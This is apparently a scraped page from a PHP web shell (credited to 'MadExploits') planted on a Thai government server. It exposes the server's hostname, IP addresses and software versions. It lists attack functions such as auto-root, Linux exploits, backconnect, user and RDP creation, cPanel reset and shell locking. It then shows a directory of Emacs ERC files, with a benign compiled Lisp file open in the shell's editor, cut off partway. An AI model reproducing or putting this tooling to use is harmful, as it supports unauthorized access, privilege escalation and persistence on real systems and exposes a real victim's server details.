Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
erc /
[ HOME SHELL ]
Name
Size
Permission
Action
erc-autoaway.elc
11.58
KB
-rw-r--r--
erc-backend.elc
154.28
KB
-rw-r--r--
erc-button.elc
16.69
KB
-rw-r--r--
erc-capab.elc
7.67
KB
-rw-r--r--
erc-compat.elc
4.38
KB
-rw-r--r--
erc-dcc.elc
39.39
KB
-rw-r--r--
erc-ezbounce.elc
5.19
KB
-rw-r--r--
erc-fill.elc
6.71
KB
-rw-r--r--
erc-goodies.elc
32.55
KB
-rw-r--r--
erc-hecomplete.elc
7.96
KB
-rw-r--r--
erc-ibuffer.elc
6.77
KB
-rw-r--r--
erc-identd.elc
4.86
KB
-rw-r--r--
erc-imenu.elc
2.61
KB
-rw-r--r--
erc-join.elc
6.03
KB
-rw-r--r--
erc-lang.elc
4.68
KB
-rw-r--r--
erc-list.elc
9.25
KB
-rw-r--r--
erc-log.elc
14.83
KB
-rw-r--r--
erc-match.elc
19.02
KB
-rw-r--r--
erc-menu.elc
6.15
KB
-rw-r--r--
erc-netsplit.elc
7.94
KB
-rw-r--r--
erc-networks.elc
39.94
KB
-rw-r--r--
erc-notify.elc
9.37
KB
-rw-r--r--
erc-page.elc
4.88
KB
-rw-r--r--
erc-pcomplete.elc
10.62
KB
-rw-r--r--
erc-replace.elc
3.85
KB
-rw-r--r--
erc-ring.elc
5.21
KB
-rw-r--r--
erc-services.elc
15.01
KB
-rw-r--r--
erc-sound.elc
5.59
KB
-rw-r--r--
erc-speedbar.elc
10
KB
-rw-r--r--
erc-spelling.elc
4.66
KB
-rw-r--r--
erc-stamp.elc
14.9
KB
-rw-r--r--
erc-track.elc
34.83
KB
-rw-r--r--
erc-truncate.elc
4.18
KB
-rw-r--r--
erc-xdcc.elc
5.74
KB
-rw-r--r--
erc.elc
219.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : erc-notify.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:03:03 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/erc/erc-notify.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`erc-notify.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\300\301!\210\300\302!\210\303\304\305\306\307\301%\207" [require erc erc-networks custom-declare-group erc-notify nil "Track online status of certain nicknames." :group] 6) #@80 *List of nicknames you want to be notified about online/offline status change. (custom-declare-variable 'erc-notify-list 'nil '(#$ . -801) :group 'erc-notify :type '(repeat string)) #@79 *Time interval (in seconds) for checking online status of notificated people. (custom-declare-variable 'erc-notify-interval '60 '(#$ . -989) :group 'erc-notify :type 'integer) #@134 *Hook run after someone on `erc-notify-list' has signed on. Two arguments are passed to the function, SERVER and NICK, both strings. (custom-declare-variable 'erc-notify-signon-hook 'nil '(#$ . -1172) :group 'erc-notify :type 'hook :options '(erc-notify-signon)) #@135 *Hook run after someone on `erc-notify-list' has signed off. Two arguments are passed to the function, SERVER and NICK, both strings. (custom-declare-variable 'erc-notify-signoff-hook 'nil '(#$ . -1442) :group 'erc-notify :type 'hook :options '(erc-notify-signoff)) (defalias 'erc-notify-signon #[(server nick) "\302\303 #\207" [nick server message "%s signed on at %s"] 4]) (defalias 'erc-notify-signoff #[(server nick) "\302\303 #\207" [nick server message "%s signed off from %s"] 4]) #@60 Last ISON information received through `erc-notify-timer'. (defvar erc-last-ison nil (#$ . 1938)) (make-variable-buffer-local 'erc-last-ison) #@62 Last time ISON was sent to the server in `erc-notify-timer'. (defvar erc-last-ison-time 0 (#$ . 2086)) (make-variable-buffer-local 'erc-last-ison-time) (defalias 'erc-notify-install-message-catalogs #[nil "\300\301\302\"\207" [erc-define-catalog english ((notify_current . "Notificated people online: %l") (notify_list . "Current notify list: %l") (notify_on . "Detected %n on IRC network %m") (notify_off . "%n has left IRC network %m"))] 3]) #@266 Non-nil if Erc-Notify mode is enabled. See the command `erc-notify-mode' for a description of this minor mode. Setting this variable directly does not take effect; either customize it (see the info node `Easy Customization') or call the function `erc-notify-mode'. (custom-declare-variable 'erc-notify-mode 'nil '(#$ . 2537) :set 'custom-set-minor-mode :initialize 'custom-initialize-default :group 'erc-notify :type 'boolean) #@169 Toggle ERC notify mode. With arg, turn ERC notify mode on if and only if arg is positive. Periodically check for the online status of certain users and report changes. (defalias 'erc-notify-mode #[(&optional arg) "\303 \304=\203 \n?\202( \203 \305 !\306V\202( \n\204\"